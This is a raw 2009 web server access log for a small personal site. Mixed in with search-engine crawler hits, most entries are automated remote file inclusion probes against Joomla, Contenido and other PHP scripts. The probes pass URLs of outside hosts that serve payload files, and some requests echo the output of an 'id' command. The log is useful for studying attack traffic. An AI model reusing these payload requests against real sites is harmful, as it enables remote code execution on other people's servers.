216.15.161.2 - - [12/Mar/2009:19:27:42 -0500] "GET /logs/?view=page&pagename=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:19:27:42 -0500] "GET /logs/access_log.1219536000/?view=page&pagename=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:19:27:43 -0500] "GET /logs/access_log.1219536000/?view=page&pagename=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
151.1.32.20 - - [12/Mar/2009:19:28:04 -0500] "GET /logs/access_log.1205366400/errors.php?error=http://www.amico.it//components/com_login/idste.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
151.1.32.20 - - [12/Mar/2009:19:28:04 -0500] "GET /errors.php?error=http://www.amico.it//components/com_login/idste.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
151.1.32.20 - - [12/Mar/2009:19:28:04 -0500] "GET /logs/errors.php?error=http://www.amico.it//components/com_login/idste.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
67.76.163.60 - - [12/Mar/2009:19:28:27 -0500] "GET /logs/access_log.1216944000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.64.34.249 - - [12/Mar/2009:19:28:44 -0500] "GET /logs/access_log.1217289600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
61.110.18.100 - - [12/Mar/2009:19:28:51 -0500] "GET /logs/access_log.1217289600//index.php?DOCUMENT_ROOT=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:19:28:53 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:19:28:53 -0500] "GET /logs/access_log.1219536000%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:19:28:53 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
91.93.97.106 - - [12/Mar/2009:19:29:36 -0500] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
69.64.34.249 - - [12/Mar/2009:19:30:51 -0500] "GET /logs/access_log.1216857600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
201.72.166.52 - - [12/Mar/2009:19:31:04 -0500] "GET /logs/access_log.1215129600//index.php?root_PATH=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
61.62.162.42 - - [12/Mar/2009:19:34:37 -0500] "GET /logs/access_log.1216944000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
70.38.31.50 - - [12/Mar/2009:19:36:14 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
70.38.31.50 - - [12/Mar/2009:19:36:14 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
70.38.31.50 - - [12/Mar/2009:19:36:14 -0500] "GET /logs/access_log.1216944000%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
77.221.130.26 - - [12/Mar/2009:19:36:15 -0500] "GET /logs/access_log.1214956800/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 382 "-""libwww-perl/5.805"
77.221.130.26 - - [12/Mar/2009:19:36:18 -0500] "GET /logs/access_log.1217030400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 382 "-""libwww-perl/5.805"
216.246.8.237 - - [12/Mar/2009:19:36:23 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
216.246.8.237 - - [12/Mar/2009:19:36:23 -0500] "GET /logs/access_log.1216684800%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
216.246.8.237 - - [12/Mar/2009:19:36:23 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
216.246.8.237 - - [12/Mar/2009:19:36:43 -0500] "GET /logs/access_log.1216425600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
151.1.32.20 - - [12/Mar/2009:19:36:50 -0500] "GET /logs/access_log.1210550400/errors.php?error=http://www.amico.it//components/com_login/idste.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
69.72.232.122 - - [12/Mar/2009:19:36:51 -0500] "GET /logs/inc.php?path_pre=http://www.buenosairesidiomas.com/centro/idv6.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.825"
69.72.232.122 - - [12/Mar/2009:19:36:51 -0500] "GET /inc.php?path_pre=http://www.buenosairesidiomas.com/centro/idv6.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.825"
77.221.130.26 - - [12/Mar/2009:19:37:09 -0500] "GET /logs/access_log.1215302400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 382 "-""libwww-perl/5.805"
77.221.130.26 - - [12/Mar/2009:19:37:18 -0500] "GET /logs/access_log.1211846400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 382 "-""libwww-perl/5.805"
69.72.232.122 - - [12/Mar/2009:19:38:59 -0500] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.outbreak.castnet.org.au/safe.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.825"
69.72.232.122 - - [12/Mar/2009:19:38:59 -0500] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.outbreak.castnet.org.au/safe.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.825"
216.246.8.237 - - [12/Mar/2009:19:41:26 -0500] "GET /logs/access_log.1216684800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
216.246.8.237 - - [12/Mar/2009:19:41:27 -0500] "GET /logs/access_log.1216425600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
216.246.8.237 - - [12/Mar/2009:19:43:36 -0500] "GET /logs/access_log.1210464000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
216.246.8.237 - - [12/Mar/2009:19:43:41 -0500] "GET /logs/access_log.1225670400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.timxtreme.nl/data/storage/attachments/css/fx29id1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
72.30.142.163 - - [12/Mar/2009:19:44:10 -0500] "GET /logs/access_log.1217635200 HTTP/1.0" 200 803460 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.125.46.29 - - [12/Mar/2009:19:44:22 -0500] "GET /logs/access_log.1219536000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:19:45:25 -0500] "GET /logs/access_log.1216944000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
82.226.108.61 - - [12/Mar/2009:19:46:03 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
82.226.108.61 - - [12/Mar/2009:19:46:03 -0500] "GET /logs/access_log.1217289600%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
82.226.108.61 - - [12/Mar/2009:19:46:03 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.34.140.49 - - [12/Mar/2009:19:51:14 -0500] "GET /logs/access_log.1219104000/index.php?inc=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
212.34.140.49 - - [12/Mar/2009:19:51:14 -0500] "GET /index.php?inc=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
212.34.140.49 - - [12/Mar/2009:19:51:14 -0500] "GET /logs/index.php?inc=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.125.46.29 - - [12/Mar/2009:19:51:49 -0500] "GET /logs/access_log.1215648000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:19:52:03 -0500] "GET /logs/access_log.1209686400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
78.137.163.133 - - [12/Mar/2009:19:52:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [12/Mar/2009:19:52:30 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
94.124.5.34 - - [12/Mar/2009:19:58:02 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://reconstructiecommunicatie.nl/modules/mod_log/test.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
94.124.5.34 - - [12/Mar/2009:19:58:02 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://reconstructiecommunicatie.nl/modules/mod_log/test.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
70.38.31.50 - - [12/Mar/2009:20:00:37 -0500] "GET /logs/access_log.1216944000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gumansin.com/id.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
70.38.31.50 - - [12/Mar/2009:20:00:57 -0500] "GET /logs/access_log.1211328000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gumansin.com/id.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
69.64.34.249 - - [12/Mar/2009:20:01:35 -0500] "GET /logs/access_log.1219017600//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.64.34.249 - - [12/Mar/2009:20:02:56 -0500] "GET /logs/access_log.1214092800//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.93.97.106 - - [12/Mar/2009:20:07:30 -0500] "GET /logs/access_log.1211328000//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.93.97.106 - - [12/Mar/2009:20:07:31 -0500] "GET /logs/access_log.1211932800//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.158.242.36 - - [12/Mar/2009:20:08:06 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.158.242.36 - - [12/Mar/2009:20:08:06 -0500] "GET /logs/access_log.1205366400%20%20//modules/xfsection/modify.php?dir_module=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.158.242.36 - - [12/Mar/2009:20:08:06 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.98.224.5 - - [12/Mar/2009:20:10:33 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
78.137.163.133 - - [12/Mar/2009:20:10:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
78.137.163.133 - - [12/Mar/2009:20:10:41 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
61.110.18.100 - - [12/Mar/2009:20:11:08 -0500] "GET /?sourcedir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:20:11:08 -0500] "GET /logs/access_log.1219536000/?sourcedir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:20:11:09 -0500] "GET /logs/?sourcedir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 122039 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:20:11:27 -0500] "GET /?sourcedir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:20:11:27 -0500] "GET /logs/access_log.1219536000/?sourcedir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
61.110.18.100 - - [12/Mar/2009:20:11:29 -0500] "GET /logs/?sourcedir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 200 122039 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:11:57 -0500] "GET /logs/?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 200 122039 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:11:58 -0500] "GET /?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:12:02 -0500] "GET /logs/?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 200 122039 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:12:02 -0500] "GET /?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
72.233.30.186 - - [12/Mar/2009:20:13:41 -0500] "GET //main.php?appserv_root=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
72.233.30.186 - - [12/Mar/2009:20:14:31 -0500] "GET /logs/access_log.1214956800//main.php?appserv_root=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
216.17.106.121 - - [12/Mar/2009:20:14:39 -0500] "GET /logs/access_log.1217808000%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1217808000%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1217808000&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3EHTTP/1.1%22%20200%2093796%20%22-%22%22libwww-perl/5.810%22%2085.17.162.125%20-%20-%20[03/Aug/2008:19:00:%20...%20includes/db_connect.php?baseDir=http:/paginas.terra.com.br/lazer/xfatalityx/id3.%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1217808000%3C/span%3E%20-%20%3Cem%3E524k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkihcsrlJ0YMBykZXNyoA;_ylu=X3oDMTB0YjF0bjMxBHNlYwNzcgRwb3MDMzI3BGNvbG8Dc2sxBHZ0aWQD/SIG=13s0kqiul/EXP=1236992988/**http%3a/www.waktusolat.net/index.php%3fmod=who%26page=941%26PHPSESSIONID=61096b721d0a80d65b9493a7c1f4b671//components/com_rwcards//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 462 "-""libwww-perl/5.65"
216.17.106.121 - - [12/Mar/2009:20:14:39 -0500] "GET //components/com_rwcards//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
216.17.106.121 - - [12/Mar/2009:20:14:39 -0500] "GET /logs/access_log.1217808000%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1217808000%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1217808000&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3EHTTP/1.1%22%20200%2093796%20%22-%22%22libwww-perl/5.810%22%2085.17.162.125%20-%20-%20[03/Aug/2008:19:00:%20...%20includes/db_connect.php?baseDir=http:/paginas.terra.com.br/lazer/xfatalityx/id3.%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1217808000%3C/span%3E%20-%20%3Cem%3E524k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkihcsrlJ0YMBykZXNyoA;_ylu=X3oDMTB0YjF0bjMxBHNlYwNzcgRwb3MDMzI3BGNvbG8Dc2sxBHZ0aWQD/SIG=13s0kqiul/EXP=1236992988/**http%3a/www.waktusolat.net//components/com_rwcards//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 462 "-""libwww-perl/5.65"
72.233.30.186 - - [12/Mar/2009:20:15:13 -0500] "GET /logs/access_log.1214611200//main.php?appserv_root=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
72.233.30.186 - - [12/Mar/2009:20:15:44 -0500] "GET /logs//main.php?appserv_root=http://www.renaultfreunde-erzgebirge.de/hk? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
85.17.231.69 - - [12/Mar/2009:20:16:00 -0500] "GET /logs/access_log.1219449600/index.php?pagina=http://bbcw.info/safe1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.820"
74.213.164.118 - - [12/Mar/2009:20:16:21 -0500] "GET /logs/access_log.1211328000//init_basic.php?GALLERY_BASEDIR=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
74.213.164.118 - - [12/Mar/2009:20:16:21 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
74.213.164.118 - - [12/Mar/2009:20:16:21 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.98.224.5 - - [12/Mar/2009:20:16:50 -0500] "GET /artwork/txt.htm HTTP/1.0" 200 3880 "-""TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
74.213.164.118 - - [12/Mar/2009:20:17:25 -0500] "GET /logs/access_log.1219536000//init_basic.php?GALLERY_BASEDIR=http://www.viniciusdemoraessp.com.br/gang11/idrose.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.98.224.5 - - [12/Mar/2009:20:17:25 -0500] "GET /artwork/index.htm HTTP/1.0" 200 11078 "-""TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
65.98.224.5 - - [12/Mar/2009:20:18:02 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "-""TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
65.98.224.5 - - [12/Mar/2009:20:18:35 -0500] "GET /logs/ HTTP/1.0" 200 121824 "-""TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
216.17.106.121 - - [12/Mar/2009:20:18:56 -0500] "GET /logs//components/com_rwcards//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
216.17.106.121 - - [12/Mar/2009:20:18:57 -0500] "GET //components/com_rwcards//errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
119.63.193.56 - - [12/Mar/2009:20:19:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
65.98.224.5 - - [12/Mar/2009:20:19:37 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
65.98.224.5 - - [12/Mar/2009:20:20:12 -0500] "GET /memorial/ HTTP/1.0" 200 817 "-""TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)"
84.42.137.159 - - [12/Mar/2009:20:21:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7 GTB5 (.NET CLR 3.5.30729)"
85.18.117.101 - - [12/Mar/2009:20:25:05 -0500] "GET /logs///poll/booth.php?include_path=http://www.candidography.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.18.117.101 - - [12/Mar/2009:20:25:05 -0500] "GET /logs/access_log.1216857600%20%20///poll/booth.php?include_path=http://www.candidography.com/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.18.117.101 - - [12/Mar/2009:20:25:05 -0500] "GET ///poll/booth.php?include_path=http://www.candidography.com/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
69.64.34.249 - - [12/Mar/2009:20:26:39 -0500] "GET /logs/access_log.1211328000//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.64.34.249 - - [12/Mar/2009:20:26:45 -0500] "GET /logs/access_log.1211932800//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.64.34.249 - - [12/Mar/2009:20:31:34 -0500] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.30.142.163 - - [12/Mar/2009:20:31:55 -0500] "GET /logs/access_log.1209600000 HTTP/1.0" 200 295885 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.63.90.81 - - [12/Mar/2009:20:32:34 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:32:34 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:32:34 -0500] "GET /logs/access_log.1202428800%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
219.85.63.226 - - [12/Mar/2009:20:33:23 -0500] "GET /logs///include/admin.lib.inc.php?site_path=http://guzelsanatlar.trakya.edu.tr/media/tz.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
219.85.63.226 - - [12/Mar/2009:20:33:23 -0500] "GET ///include/admin.lib.inc.php?site_path=http://guzelsanatlar.trakya.edu.tr/media/tz.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
61.63.90.81 - - [12/Mar/2009:20:33:51 -0500] "GET /logs/access_log.1217030400/?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:33:52 -0500] "GET /?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:33:54 -0500] "GET /logs/?sourcedir=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 200 122039 "-""libwww-perl/5.805"
61.63.90.81 - - [12/Mar/2009:20:34:26 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=uid=2(daemon)%20gid=2(daemon)%20groups=1(bin),2(daemon),4(adm),7(lp)%0A? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
75.68.107.101 - - [12/Mar/2009:20:34:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3921 "http://search.yahoo.com/search?p=tattoo+flash+1950&fr=yfp-t-105&toggle=1&cop=mss&ei=UTF-8""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
